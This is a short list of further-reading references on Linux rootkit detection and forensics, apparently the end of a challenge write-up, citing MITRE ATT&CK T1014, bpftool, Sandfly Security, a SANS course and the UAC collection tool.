- MITRE ATT&CK T1014 sub-techniques: Full taxonomy of rootkit types and detection methods.
- bpftool documentation: Detection of eBPF-based rootkits.
- Sandfly Security blog (sandflysecurity.com): Practical LKM rootkit detection techniques that do not rely on compromised system tools.
- SANS FOR577: Linux and Mac memory forensics and rootkit analysis course.
- UAC project (github.com/tclahr/uac): Documentation for the collection tool used in this challenge.